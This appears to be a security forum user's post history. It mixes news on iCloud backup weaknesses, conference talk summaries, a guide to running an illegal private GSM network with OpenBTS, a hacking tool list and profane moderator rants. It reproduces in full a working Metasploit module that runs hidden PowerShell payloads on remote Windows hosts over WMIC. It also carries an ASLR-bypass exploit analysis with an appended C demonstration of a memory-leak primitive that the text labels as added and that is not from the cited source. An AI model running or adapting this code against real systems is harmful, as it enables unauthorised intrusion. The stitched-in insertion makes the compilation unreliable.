Everything posted by Nytro
-
Can you trust 'NSA-proof' TrueCrypt? Cough up some dough and find out
Nytro replied to sTrEs's topic in Security news
Yes, I thought about this possibility too; a very detailed piece of research on the subject would be nice. And TrueCrypt isn't the only piece that should be analyzed this way. I would start from the kernel itself (Linux)... -
Superb, with pictures; maybe at least this way people will look over it.
-
Apple's iCloud cracked: Lack of two-factor authentication allows remote data download

Summary: Notorious Russian hacker Vladimir Katalov released findings showing Apple's iCloud vulnerable to unauthorized download access, with iCloud data stored on Microsoft and Amazon servers.

By Violet Blue for Zero Day | October 21, 2013

KUALA LUMPUR, MALAYSIA — Russian security researcher Vladimir Katalov analyzed Apple's secretive iCloud and Find My Phone protocols to discover that neither is protected by two-factor authentication, and iCloud data can be downloaded remotely without a user ever knowing.

In "Cracking and Analyzing Apple's iCloud Protocols," presented to a crowded room at the Hack In The Box security conference last Thursday in Kuala Lumpur, Malaysia, Vladimir Katalov revealed that user information and data are not as inaccessible as Apple is telling the public. Katalov's findings appear to support his emphatic statement that Apple can access data it claims to not be able to access.

A malicious attacker only needs an Apple ID and password to perform remote iCloud backups — and does not need the user's linked devices.

He explained that there is no way for a user to encrypt their iCloud backups. The data is encrypted, he explained, but the keys are stored with the data. Katalov added that Apple holds the encryption keys.

Katalov told ZDNet he was shocked to discover that in addition to all of these security chain issues, Apple's iCloud data is stored on Microsoft and Amazon servers.

Katalov's presentation pointed out that because Apple provides full request information to its third-party storage providers (Amazon and Microsoft), Apple could provide this data to law enforcement. In Apple's July public statement on the NSA PRISM surveillance program, Apple denied any backdoor server access for government agencies. Apple unequivocally stated, "Apple does not give law enforcement access to its servers."

When a user performs an iCloud backup download, they receive an email informing them that the process is complete. Katalov discovered that when a remote download is performed, the user receives no notification email. If a user's data is accessed and downloaded from iCloud by a remote third party, they would not know.

Katalov's work represents the first time anyone has analyzed and publicly presented findings on Apple's secretive iCloud protocol. Vladimir Katalov analyzed Apple's iCloud and Find My Phone protocols by sniffing HTTP traffic on jailbroken devices — though he was careful to explain that a user's devices do not need to be jailbroken for a malicious entity to exploit the remote backup protocol security omissions Katalov discovered. Analyzing the traffic, he told the crowded room during his Thursday presentation, was not difficult.

Apple's iCloud data consists of what a user stores as a data backup. It contains documents, Dropbox files and sensitive user data. In his analysis, Katalov discovered that iCloud files are stored as a container — plist and content — in a files-to-chunks mapping schema. But he found that Apple's two-factor authentication, a layer of user security used in addition to a username and password, is not used for iCloud backups (or Find My Phone).

Apple's two-step authentication ("2FA") does not protect iCloud backups, Find My Phone data and the documents stored in the cloud. Katalov details this further in a blog post: "Apple Two-Factor Authentication and the iCloud."

Katalov showed Hack In The Box attendees that with simple queries, it's possible to get the authentication token for accessing the iCloud backup, the backup IDs, and the encryption keys. Then one can download the files from where they're stored in Windows Azure or Amazon AWS.

ZDNet caught up with Katalov after his presentation to find out more.

When asked if he had presented his discoveries to Apple, he explained that his findings were the results of protocol analysis — and are not a vulnerability. Put another way, the iCloud security hole falls into the "it's a feature, not a bug" category.

When ZDNet asked Katalov if there was a way for Apple to fix this issue — such as extending two-factor authentication to its iCloud and Find My Phone services — he shook his head and told us that Apple's implementation of two-factor auth was likely "only an afterthought."

Katalov told ZDNet the best thing a user can do to protect their iCloud data is to simply not use iCloud. However, Katalov told us he still uses Apple's iCloud as a backup service. "It is not exactly safe, but I am selecting between security and privacy," he said.

It's easy to argue that because a remote attacker needs an Apple user ID and password, the data is still out of reach to most malicious entities. However, obtaining Apple user IDs and passwords isn't impossible — aside from email phishing techniques, which are more effective than most would believe. Social engineering techniques are sadly common and also very effective.

A recent example is the spate of Apple ID data thefts in Norway. This past February, a significant number of teenage girls were targeted by boys who easily surmised the girls' user ID and password recovery information to gain access to their Apple accounts and download photos and the girls' data — which, sadly, ended up passed around and also sold online.

In his Hack In The Box presentation, Katalov told the audience that he was also surprised to discover that when a user shuts off location tracking services, the user's location is still stored for around 3-6 hours.

We wondered if this is what led Katalov to mention that next he will analyze Touch ID protocol and storage — as soon as iOS 7 is jailbroken, he told ZDNet.

"Apple says it never sends the information, and it is never copied to local [storage]," he added, "but I am not so sure."

ZDNet asked why Katalov felt this way, when Apple specifically states that it does not transmit Touch ID information. Katalov's eyes glittered, and a boyish smile crept across his face. In his thick Russian accent he replied, "Trust no one."

ZDNet has contacted Apple for comment and will update this article if Apple responds.

Source: Apple's iCloud cracked: Lack of two-factor authentication allows remote data download | ZDNet
-
Windows Management Instrumentation (WMI) Remote Command Execution
Nytro posted a topic in Exploits
Windows Management Instrumentation (WMI) Remote Command Execution
Authored by Ben Campbell | Site metasploit.com

This Metasploit module executes powershell on the remote host using the current user credentials or those supplied. Instead of using PSEXEC over TCP port 445 we use the WMIC command to start a Remote Procedure Call on TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel traffic through that session. The result is similar to psexec but with the added benefit of using the session's current authentication token instead of having to know a password or hash. We do not get feedback from the WMIC command so there are no indicators of success or failure. The remote host must be configured to allow remote Windows Management Instrumentation.

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'
    require 'rex'

    class Metasploit3 < Msf::Exploit::Local
      Rank = ExcellentRanking

      include Msf::Exploit::Powershell

      def initialize(info={})
        super( update_info( info,
          'Name'           => 'Windows Management Instrumentation (WMI) Remote Command Execution',
          'Description'    => %q{
            This module executes powershell on the remote host using the current
            user credentials or those supplied. Instead of using PSEXEC over TCP
            port 445 we use the WMIC command to start a Remote Procedure Call on
            TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel
            traffic through that session. The result is similar to psexec but
            with the added benefit of using the session's current authentication
            token instead of having to know a password or hash.

            We do not get feedback from the WMIC command so there are no indicators
            of success or failure. The remote host must be configured to allow
            remote Windows Management Instrumentation.
          },
          'License'        => MSF_LICENSE,
          'Author'         => [ 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' ],
          'References'     =>
            [
              [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
              [ 'OSVDB', '3106'],
              [ 'URL', 'http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html' ],
            ],
          'DefaultOptions' =>
            {
              'EXITFUNC' => 'thread',
              'WfsDelay' => '15',
            },
          'DisclosureDate' => 'Jan 01 1999',
          'Platform'       => [ 'win' ],
          'SessionTypes'   => [ 'meterpreter' ],
          'Targets'        =>
            [
              [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
              [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
            ],
          'DefaultTarget'  => 0
        ))

        register_options([
          OptString.new('SMBUser', [ false, 'The username to authenticate as' ]),
          OptString.new('SMBPass', [ false, 'The password for the specified username' ]),
          OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication' ]),
          OptAddressRange.new("RHOSTS", [ true, "Target address range or CIDR identifier" ]),
          # Move this out of advanced
          OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener'])
        ])
      end

      def exploit
        if datastore['SMBUser'] and datastore['SMBPass'].nil?
          fail_with(Failure::BadConfig, "Need both username and password set.")
        end

        Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
          # TODO: CHECK WMIC Access by reading the clipboard?
          # TODO: wmic /output:clipboard
          # TODO: Needs to be meterpreter ext side due to threading

          # Get the PSH Payload and split it into bitesize chunks
          # 1024 appears to be the max value allowed in env vars
          psh = cmd_psh_payload(payload.encoded).gsub("\r\n","")
          psh = psh[psh.index("$si")..psh.length-1]
          chunks = split_code(psh, 1024)

          begin
            print_status("[#{server}] Storing payload in environment variables")
            env_name = rand_text_alpha(rand(3)+3)

            env_vars = []
            0.upto(chunks.length-1) do |i|
              env_vars << "#{env_name}#{i}"
              c = "cmd /c SETX #{env_vars[i]} \"#{chunks[i]}\" /m"
              wmic_command(server, c)
            end

            x = rand_text_alpha(rand(3)+3)
            exec_cmd = "powershell.exe -nop -w hidden -c $#{x} = ''"
            env_vars.each do |env|
              exec_cmd << "+$env:#{env}"
            end
            exec_cmd << ";IEX $#{x};"

            print_status("[#{server}] Executing payload")
            wmic_command(server, exec_cmd)

            print_status("[#{server}] Cleaning up environment variables")
            env_vars.each do |env|
              cleanup_cmd = "cmd /c REG delete \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"
              wmic_command(server, cleanup_cmd)
            end
          rescue Rex::Post::Meterpreter::RequestError => e
            print_error("[#{server}] Error moving on... #{e}")
            next
          ensure
            select(nil,nil,nil,2)
          end
        end
      end

      def wmic_user_pass_string(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])
        userpass = ""
        unless user.nil?
          if domain.nil?
            userpass = "/user:\"#{user}\" /password:\"#{pass}\" "
          else
            userpass = "/user:\"#{domain}\\#{user}\" /password:\"#{pass}\" "
          end
        end

        return userpass
      end

      def wmic_command(server, cmd)
        wcmd = "wmic #{wmic_user_pass_string}/node:#{server} process call create \"#{cmd.gsub('"','\\"')}\""
        vprint_status("[#{server}] #{wcmd}")
        # We don't use cmd_exec as WMIC cannot be Channelized
        ps = session.sys.process.execute(wcmd, "", {'Hidden' => true, 'Channelized' => false})
        select(nil,nil,nil,0.1)
      end

      def split_code(psh, chunk_size)
        array = []
        idx = 0
        while (idx < psh.length)
          array << psh[idx, chunk_size]
          idx += chunk_size
        end

        return array
      end
    end

Source: Windows Management Instrumentation (WMI) Remote Command Execution - Packet Storm -
stresslinux

Welcome to stresslinux

What is stresslinux

stresslinux is a minimal Linux distribution running from a bootable CD-ROM, USB, VMware or via PXE (wip). stresslinux makes use of some utilities available on the net like: stress, cpuburn, hddtemp, lm_sensors ... stresslinux is dedicated to users who want to test their system(s) entirely under high load and monitor their health.

Who needs it

Stresslinux is for people (system builders, overclockers) who want to test their hardware under high load and monitor stability and the thermal environment. You should be familiar with the Linux console because stresslinux comes without a graphical user interface.

Where to start

Downloads
Docs: FAQ, Documentation, Software
Community: Forum, Reviews, Facebook, Google+

Screenshots

You like stresslinux and want to say thanks

Source: Stresslinux
-
Hack3rcon 4 - Character Assassination: Fun And Games With Unicode - Adrian Crenshaw

Description: This talk will cover some of the general security considerations of Unicode: homoglyph attacks, punycode, shellcode, stego, etc.

Adrian Crenshaw has worked in the IT industry for the last fifteen years. He runs the information security website Irongeek.com, which specializes in videos and articles that illustrate how to use various pen-testing and security tools. He did the cert chase for a while (MCSE NT 4, CNE, A+, Network+, i-Net+) but stopped once he had to start paying for the tests himself. He's currently working on a Masters in Security Informatics, and is interested in obtaining a network security/research/teaching job in academia (though he's beginning to think that the corporate world has a better grasp on ethics/academic freedom). He is also one of the co-founders of Derbycon.

For more information please visit: Hack3rCon^4 - Eye of the Storm; Hack3rcon 4 Videos (Hacking Illustrated Series InfoSec Tutorial Videos)

Source: Hack3rcon 4 - Character Assassination: Fun And Games With Unicode - Adrian Crenshaw
-
Hack3rcon 4 - Ms08-067 Under The Hood - John Degruyter

Description: The purpose of this talk is to get a better understanding of using a debugger and looking at the low-level process of exploiting a software vulnerability. We will be visiting our faithful old friend, ms08_067. First, we will look at the structure of the Metasploit module and the functions that make it up. Then we will move to the victim's system, where we will be firing up a debugger and taking a look at the vulnerable process, library and function. Next, we will launch the Metasploit module from our attack system and watch the memory corruption. Finally, we'll follow the exploit as it disables DEP in the acgenral.dll module and then jumps to our shellcode for a win.

Speakers: John Degruyter

For more information please visit: Hack3rCon^4 - Eye of the Storm; Hack3rcon 4 Videos (Hacking Illustrated Series InfoSec Tutorial Videos)

Source: Hack3rcon 4 - Ms08-067 Under The Hood - John Degruyter
-
Hack3rcon 4 - Advanced Evasion Techniques - Pwning The Next Generation Security Products (Keynote) - David Kennedy

Description: We know anti-virus is dead; there's no more beating it with a stick and it's easy to get around. What about the next set of security products, and how do they actually work? Preventive technology is advancing and the attacks are getting slightly harder (albeit not much). This talk goes into advanced evasion techniques for getting around some of the new pieces of technology that we face out there. Everything from next-generation technologies, virtualization technologies, application firewalls, and more: this talk will show how to effectively test and identify how to best get around what we're seeing out there. It's time to pwn the next generation of security product lines.

David Kennedy (@dave_rel1k) is founder and principal security consultant of TrustedSec, an information security consulting firm located in Cleveland, Ohio. David was the former Chief Security Officer (CSO) for a Fortune 1000 where he ran the entire information security program. Kennedy is a co-author of the book "Metasploit: The Penetration Testers Guide," the creator of the Social-Engineer Toolkit (SET), and Artillery. Kennedy has presented on a number of occasions at Black Hat, Defcon, ShmooCon, BSIDES, Infosec World, Notacon, AIDE, ISACA, ISSA, Infragard, Infosec Summit, Hack3rCon and a number of other security-related conferences. Kennedy has been interviewed by several news organizations including CNN, Fox News, and BBC World News. Kennedy was formerly on the Back|Track development team and Exploit-DB team and co-host of the Social-Engineer.org podcast. Kennedy is one of the co-authors of the Penetration Testing Execution Standard (PTES), a framework designed to fix the penetration testing industry. Kennedy is the co-founder of DerbyCon, a large-scale conference in Louisville, Kentucky.

Prior to Diebold, Kennedy was a VP of Consulting and Partner of a mid-size information security consulting company running the security consulting practice. Prior to the private sector, Kennedy worked for the United States Marine Corps and deployed to Iraq twice for intelligence-related missions.

For more information please visit: Hack3rCon^4 - Eye of the Storm; Hack3rcon 4 Videos (Hacking Illustrated Series InfoSec Tutorial Videos)

Source: Hack3rcon 4 - Advanced Evasion Techniques - Pwning The Next Generation Security Products (Keynote) - David Kennedy
-
Problems with the Offtopic, Help, Requests, Market categories
Nytro replied to Nytro's topic in Important announcements
The problem has been fixed... -
It was closed precisely to keep out beggars like you. Ban.
-
NSA intercepted millions of phone communications in France
Nytro replied to Usr6's topic in Security news
Great. We ordinary mortals can't do much. But if a bunch of states get on its case, maybe something will get done. -
How to create your own mobile phone network
Nytro replied to Nytro's topic in Mobile security
Yes, spam. You drive around town in your car and send messages like crazy. -
iLikeIT. How to create your own mobile phone network, so you can call for help after an earthquake

As is well known, in the event of a high-magnitude earthquake the power and telephone networks go down. So how do we send an emergency message to rescuers if we remain trapped somewhere? The solution is fairly simple and was presented on iLikeIT with the help of Bogdan Alecu, a mobile security specialist. More details at: http://www.m-sec.net

It must be stated from the outset that creating your own mobile phone network is illegal, and this solution should be applied only in cases of extreme emergency.

The equipment you need is the following: a laptop, a USB stick containing special software, and a simple phone, of any model and no matter how old. If there is no power, the laptop can be used thanks to its built-in battery. The phone connects to the laptop with an ordinary data cable. Also, the software on the USB stick does not need to be installed; it can be run directly from the portable device. Here are a few details:

1. The operating system is Ubuntu, on which the software that controls the entire phone network was installed. This software is called OpenBTS and can be downloaded for free from this address.

2. The whole operating system was installed on a USB stick and ran from it.

3. The whole system can be configured to run and start automatically, even on a notebook with modest requirements (4GB RAM, USB 2.0 port, dual-core processor). The phone used as the transceiver is a Motorola C123 connected via USB, onto which OpenBTS loads its own firmware. In other words, another open-source operating system is loaded onto this phone, and the transmit frequency as well as the other operating parameters are controlled by OpenBTS.

4. Of course, instead of this phone, a GSM antenna with an amplifier can be used in order to cover a larger area.

5. The newly created network can be used both to send warning messages and to locate possible victims. Because it is a network that gives the user full control, this portable method can be used to locate victims. The transmit power can be limited, as can the range it transmits over (in steps of 500m), and when a new phone registers on the network the operator is notified. This way, you narrow the search area down to that limited zone of up to 500m.

6. So that everyone understands, the idea is this: it doesn't matter if none of the mobile operators in Romania are working at that moment. Once you create your own phone network, the other phones within its coverage will automatically see your network and connect to it.

7. Also, it doesn't matter if the phone is locked to a particular network: Vodafone, Orange, Cosmote or Digi.

Source and video: iLikeIT. How to create your own mobile phone network, so you can call for help after an earthquake

This can be put to good use. You're the ones who come up with ideas for doing shitty things.
-
"from people's online email address books and instant messaging (IM) "buddy lists" That's ugly and not legal. But most of the time email addresses are made far too public.
-
Problems with the Offtopic, Help, Requests, Market categories
Nytro replied to Nytro's topic in Important announcements
Tutorial: "How to get banned" -
ASLR Bypass Apocalypse in Recent Zero-Day Exploits
October 15, 2013 | By Xiaobo Chen

ASLR (Address Space Layout Randomization) is one of the most effective protection mechanisms in modern operating systems. But it's not perfect. Many recent APT attacks have used innovative techniques to bypass ASLR. Here are just a few interesting bypass techniques that we have tracked in the past year:

- Using non-ASLR modules
- Modifying the BSTR length/null terminator
- Modifying the Array object

The following sections explain each of these techniques in detail.

Non-ASLR modules

Loading a non-ASLR module is the easiest and most popular way to defeat ASLR protection. Two popular non-ASLR modules are used in IE zero-day exploits: MSVCR71.DLL and HXDS.DLL.

MSVCR71.DLL: JRE 1.6.x ships an old version of the Microsoft Visual C Runtime Library that was not compiled with the /DYNAMICBASE option. By default, this DLL is loaded into the IE process at a fixed location in the following OS and IE combinations:

- Windows 7 and Internet Explorer 8
- Windows 7 and Internet Explorer 9

HXDS.DLL, shipped with MS Office 2010/2007, is not compiled with ASLR. This technique was first described here, and is now the most frequently used ASLR bypass for IE 8/9 on Windows 7. This DLL is loaded when the browser loads a page with 'ms-help://' in the URL.

The following zero-day exploits used at least one of these techniques to bypass ASLR: CVE-2013-3893, CVE-2013-1347, CVE-2012-4969, CVE-2012-4792.

Limitations

The non-ASLR module technique requires IE 8 and IE 9 to run with old software such as JRE 1.6 or Office 2007/2010. Upgrading to the latest versions of Java/Office can prevent this type of attack.

Modify the BSTR length/null terminator

This technique first appeared in the 2010 Pwn2Own IE 8 exploit by Peter Vreugdenhil. It applies only to specific types of vulnerabilities that can overwrite memory, such as buffer overflow, arbitrary memory write, and increasing or decreasing the content of a memory pointer.

The arbitrary memory write does not directly control EIP. Most of the time, the exploit overwrites important program data such as function pointers to execute code. For attackers, the good thing about these types of vulnerabilities is that they can corrupt the length of a BSTR so that using the BSTR can access memory outside of its original boundaries. Such accesses may disclose memory addresses that can be used to pinpoint libraries suitable for ROP. Once the exploit has bypassed ASLR in this way, it can then use the same memory corruption bug to control EIP.

Few vulnerabilities can be used to modify the BSTR length. For example, some vulnerabilities can only increase/decrease memory pointers by one or two bytes. In this case, the attacker can modify the null terminator of a BSTR to concatenate the string with the next object. Subsequent accesses to the modified BSTR have the concatenated object's content as part of the BSTR, where attackers can usually find information related to DLL base addresses.

CVE-2013-0640

The Adobe XFA zero-day exploit uses this technique to find the AcroForm.api base address and builds a ROP chain dynamically to bypass ASLR and DEP. With this vulnerability, the exploit can decrease a controllable memory pointer before calling the function pointer from its vftable.

Consider the following memory layout before the DEC operation:

[string][null][non-null data][object]

After the DEC operation (in my tests, it is decreased twice) the memory becomes:

[string][\xfe][non-null data][object]

For further details, refer to the technique write-up on the Immunity Inc. blog.

Limitations

This technique usually requires multiple writes to leak the necessary info, and the exploit writer has to carefully craft the heap layout to ensure that the length field is corrupted instead of other objects in memory. Since IE 9, Microsoft has used Nozzle to prevent heap spraying/feng shui, so sometimes the attacker must use the VBArray technique to craft the heap layout.

Modify the Array object

The array object length modification is similar to the BSTR length modification: they both require a certain class of "user-friendly" vulnerabilities. Even better, from the attacker's view, is that once the length changes, the attacker can also arbitrarily read from or write to memory — or basically take control of the whole process flow and achieve code execution.

Here is the list of known zero-day exploits using this technique:

CVE-2013-0634

This exploit involves an Adobe Flash Player regex handling buffer overflow. The attacker overwrites the length of a Vector.<Number> object, and then reads more memory content to get the base address of flash.ocx. Here's how the exploit works:

1. Set up a continuous memory layout by allocating the following objects:

2. Free the <Number> object at index 1 of the above objects as follows: obj[1] = null;

3. Allocate the new RegExp object. This allocation reuses memory in the obj[1] position as follows:

   boom = "(?i)()()(?-i)||||||||||||||||||||||||";
   var trigger = new RegExp(boom, "");

Later, the malformed expression overwrites the length of the Vector.<Number> object in obj[2] to enlarge it. With a corrupted size, the attacker can use obj[2] to read from or write to memory in a huge region to locate the flash.ocx base address and overwrite a vftable to execute the payload.

CVE-2013-3163

This vulnerability involves an IE CBlockContainerBlock object use-after-free error. This exploit is similar to CVE-2013-0634, but more sophisticated. Basically, this vulnerability modifies arbitrary memory content using an OR instruction. The instruction is something like the following:

or dword ptr [esi+8],20000h

Here's how it works:

First, the attacker sprays the target heap memory with Vector.<uint> objects. After the spray, those objects are stored aligned at a stable memory address. The first dword, 0x03f0, is the length of the Vector.<uint> object, and the remaining values correspond to the values in the spray code.

If the attacker makes esi + 8 point to the 0x03f0 length field, the size becomes 0x0203f0 after the OR operation — which is much larger than the original size. With the larger access range, the attacker can change the next object's length to 0x3FFFFFF0. From there, the attacker can access the whole memory space of the IE process. ASLR is useless because the attacker can retrieve the entire DLL images for kernel32/NTDLL directly from memory. By dynamically searching for stack pivot gadgets in the text section and locating the ZwProtectVirtualMemory native API address from the IAT, the attacker can construct a ROP chain to change the memory attribute and bypass DEP.

By crafting the memory layout, the attacker also allocates a Vector.<object> that contains the flash.Media.Sound() object. The attacker uses the corrupted Vector.<uint> object to search for the sound object in memory and overwrite its vftable to point to the ROP payload and shellcode.

CVE-2013-1690

The use-after-free vulnerability in Firefox's DocumentViewerImpl object allows the user to write a word value 0x0001 into an arbitrary memory location. In the vulnerable code, all the variables that start with "m" are read from the user-controlled object. If the user can set the object to meet the condition in the second "if" statement, it forces the code path into the setImageAnimationMode() call, where the memory write is triggered.

In this exploit, the attacker tries to use ArrayBuffer to craft the heap layout. Each ArrayBuffer element for var2 has the original size 0xff004. After triggering the vulnerability, the attacker increases the size of the array to 0x010ff004. The attacker can also locate this ArrayBuffer by comparing the byteLength in JavaScript. Then, the attacker can read from or write to memory with the corrupted ArrayBuffer. In this case, the attacker chose to disclose the NTDLL base address from SharedUserData (0x7ffe0300), and manually hardcoded the offset to construct the ROP payload.

CVE-2013-1493

This vulnerability involves a Java CMM integer overflow that allows overwriting the array length field in memory. During exploitation, the array length actually expands to 0x7fffffff, and the attacker can search for the securityManager object in memory and null it to break the sandbox. This technique is much more effective than overwriting function pointers and dealing with ASLR/DEP to get native code execution.

The Array object modification technique is much better than other techniques. For the Flash ActionScript vector technique, there are no heap spray mitigations at all. As long as you have a memory-write vulnerability, it is easily implemented.

Summary

The following table outlines recent APT zero-day exploits and what bypass techniques they used:

Conclusion

ASLR bypassing has become more and more common in zero-day attacks. We have seen previous IE zero-day exploits using a Microsoft Office non-ASLR DLL to bypass it, and Microsoft also did some mitigation in their latest OS and browser to prevent use of the non-ASLR module to defeat ASLR. Because the old technique will no longer work and can be easily detected, cybercriminals will have to use the advanced exploit technique. But for specific vulnerabilities that allow writing memory, combining the Vector.<uint> and Vector.<object> is more reliable and flexible. With just one shot, extending the exploit from writing a single byte to reading or writing gigabytes is easy and works for the latest OS and browser regardless of the OS, application, or language version.

Many researchers have published research on ASLR bypassing, such as Dion Blazakis's JIT spray and Yuyang's LdrHotPatchRoutine technique. But so far we haven't seen any zero-day exploit leveraging them in the wild. The reason could be that these techniques are generic approaches to defeating ASLR, and they are usually fixed quickly after going public. But there is no generic way to fix vulnerability-specific issues. In the future, expect more and more zero-day exploits using similar or more advanced techniques. We may need new mitigations in our OSs and security products to defeat them.

Thanks again to Dan Caselden and Yichong Lin for their help with this analysis.

Source: ASLR Bypass Apocalypse in Recent Zero-Day Exploits | FireEye Blog
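The length-field corruption the article walks through for CVE-2013-3163 (one `or dword ptr [esi+8],20000h` turns a Vector.<uint> length of 0x03f0 into 0x0203f0, after which "in-bounds" reads land in the neighbouring object and leak its vftable pointer) can be modelled in a few lines of plain C. The block below is an added example written for this page; it is not code from the FireEye post or from any of the exploits it describes. The Vector layout, the Sound-like object with a vftable, the "module" that vftable points into, the 0x400 vftable offset and the arena standing in for the sprayed heap are all assumptions of the example, chosen only so the layout is deterministic.

```c
/* Added example, not code from the FireEye post: a plain-C model of the
 * "modify the Array object" primitive (the CVE-2013-3163 case).  The Vector,
 * the object with a vftable and the "module" are hand-built stand-ins laid
 * out in one arena so the heap layout is deterministic; nothing here touches
 * Flash or IE.  The VTABLE_OFFSET value is an assumption of the example. */
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define VEC_ELEMS     0x3f0u    /* same element count as the article's dump */
#define VTABLE_OFFSET 0x400u    /* assumed offset of the vftable inside the "module" */

/* Stand-in for the loaded DLL: base = leaked vftable pointer - VTABLE_OFFSET. */
static uint8_t fake_module[0x1000];

/* Stand-in for a Flash Vector.<uint>: length header, then the elements. */
typedef struct {
    uint32_t length;            /* element count; the only thing vec_get() trusts */
    uint32_t reserved;
    uint32_t data[];
} vec_uint;

/* Stand-in for the object that follows the vector in memory (the article's
 * flash.Media.Sound): its first field is the vftable pointer. */
typedef struct {
    uintptr_t vftable;
    uint32_t  fields[2];
} sound_obj;

/* "Heap": the vector and the object sit back to back, as after a spray.
 * uint64_t storage keeps the object's pointer field naturally aligned. */
static uint64_t arena[(sizeof(vec_uint) + VEC_ELEMS * 4 + sizeof(sound_obj)) / 8 + 1];

/* Bounds-checked element read, the way the runtime does it. */
static int vec_get(const vec_uint *v, uint32_t idx, uint32_t *out) {
    if (idx >= v->length) return -1;          /* only the length field guards this */
    *out = v->data[idx];
    return 0;
}

/* Build the layout [vec_uint][sound_obj] and return the vector. */
static vec_uint *layout(void) {
    memset(arena, 0, sizeof arena);
    vec_uint *v = (vec_uint *)arena;
    v->length = VEC_ELEMS;
    for (uint32_t i = 0; i < VEC_ELEMS; i++) v->data[i] = 0x41414141u;
    sound_obj *o = (sound_obj *)((uint8_t *)arena + sizeof(vec_uint) + VEC_ELEMS * 4);
    o->vftable = (uintptr_t)&fake_module[VTABLE_OFFSET];
    return v;
}

/* Before corruption, reading one element past the end is refused (-1). */
int read_past_end_refused(void) {
    uint32_t x;
    return vec_get(layout(), VEC_ELEMS, &x);
}

/* The write primitive: a single OR against the length header.
 * 0x3f0 | 0x20000 = 0x203f0, the value quoted in the article. */
uint32_t corrupt_length_via_or(vec_uint *v) {
    v->length |= 0x20000u;
    return v->length;
}

/* With the inflated length every index passes the check, so indices at and
 * past VEC_ELEMS read the neighbouring object's fields.  Reassemble the
 * vftable pointer word by word and subtract the known in-module offset. */
uintptr_t leak_module_base(void) {
    vec_uint *v = layout();
    corrupt_length_via_or(v);
    uint32_t words[sizeof(uintptr_t) / 4] = {0};
    for (size_t i = 0; i < sizeof(uintptr_t) / 4; i++)
        if (vec_get(v, (uint32_t)(VEC_ELEMS + i), &words[i]) != 0) return 0;
    uintptr_t vft;
    memcpy(&vft, words, sizeof vft);           /* words are copied in memory order */
    return vft - VTABLE_OFFSET;
}

/* The address the leak should recover, for comparison. */
uintptr_t real_module_base(void) { return (uintptr_t)fake_module; }

int main(void) {
    printf("read past end before corruption: %d\n", read_past_end_refused());
    printf("leaked base  %#" PRIxPTR "\nactual base  %#" PRIxPTR "\n",
           leak_module_base(), real_module_base());
    return leak_module_base() == real_module_base() ? 0 : 1;
}
```

Compile with any C99 compiler and run: the bounds check refuses index 0x3f0 before the OR and accepts it afterwards, and the recovered base equals the arena's fake module address. The point is the one the article makes about Vector.<uint>: the runtime trusts nothing but the length header, so one write to it converts a memory-write primitive into an arbitrary read, and from there into an ASLR bypass.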
-
Problems with the Offtopic, Ajutor, Cereri, Market categories
Nytro posted a topic in Anunturi importante
Hi, Some problems have appeared with the Offtopic, Cereri (Requests) and Ajutor (Help) categories (plus others). It seems that new topics can no longer be opened in those categories. You can't even post anymore. I promise that tomorrow evening I will fix the problem. Until then, learn one single thing: STOP BEING BEGGARS. I keep following the forum and I hope to see at least 2-3 people who step forward and show that they have the right mentality and want to help the community. But everyone minds only their own business; nobody would post something useful for the others in the community. If you also check the latest posts you will see the main discussion categories: Offtopic, Cereri and Ajutor. You know how to ask for help, how to hold out your hand, but you don't know how to help in return. Beggars, moochers, that's what you are. So, for 24 hours, for now, you will not be able to post in those categories. Make a contribution yourselves. Do something useful for the others too, not just for yourselves. If you don't like the decision, throw a tantrum and suck my dick. Blow me. -
Tools

FreeRDP-pth (20/10/2013) - FreeRDP-pth is a slightly modified version of FreeRDP that tries to authenticate using a password hash instead of a password. This works only against RDP v8.1 servers (Windows 2012 R2 at the time of writing) and even then, only for members of the administrators group. Refer to the companion blog post for more information about Restricted Mode and pass-the-hash.
UDP Protocol Analysis – Interactive Python Tool (9/9/2013) - UDP protocol analysis is a python module which can be used in scripted analysis or interactively using ipython.
Local MySQL Password Bruteforcer (15/2/2013) - Local MySQL Password Bruteforcer is a python script to assess the strength of the local MySQL access passwords.
HeaderCheck (15/2/2013) - HeaderCheck is a python script used to check the security settings of various headers returned by web servers.
ssl-cipher-suite-enum (13/2/2013) - ssl-cipher-suite-enum is a perl script to enumerate the SSL cipher suites supported by network services (principally HTTPS).
UNIXSocketScanner (31/1/2013) - UNIXSocketScanner is a perl script to locally enumerate UNIX domain sockets.
get-dhcp-opts (12/12/2012) - get-dhcp-opts is a tool to discover DHCP/BOOTP servers on your LAN, and dump the DHCP/BOOTP options.
VulnApp (15/9/2012) - VulnApp is a vulnerable web application written in ASP.net.
rdp-sec-check (15/7/2012) - rdp-sec-check is a perl script to enumerate security settings of an RDP Service (AKA Terminal Services).
nopc (3/7/2012) - nopc is a Nessus based UNIX patch checker. It utilises Nessus' nasls and instructs you on what data you need to manually get from the system to perform that patch check. This was developed for situations when network connectivity to the systems under review is not possible.
secdump (24/3/2012) - secdump is a simple meterpreter module that uploads and runs gsecdump. Nothing fancy, just a time saver.
SSHatter (16/2/2011) - SSHatter is a perl script to perform brute force attacks on SSH.
hoppy (9/10/2009) - hoppy is a python script to probe HTTP options and perform scanning for information disclosure issues.
ManySSL (9/12/2008) - ManySSL is a perl script to enumerate the SSL cipher suites supported by network services (principally HTTPS).
udp-proto-scanner (26/11/2008) - udp-proto-scanner is a perl script which discovers UDP services by sending triggers to a list of hosts.
MS08-067 check (18/11/2008) - MS08-067 check is a python script which can anonymously check if a target machine or a list of target machines are affected by the MS08-067 vulnerability.
polenum (30/10/2008) - polenum is a python script which can be used to get the password policy from a Windows machine.
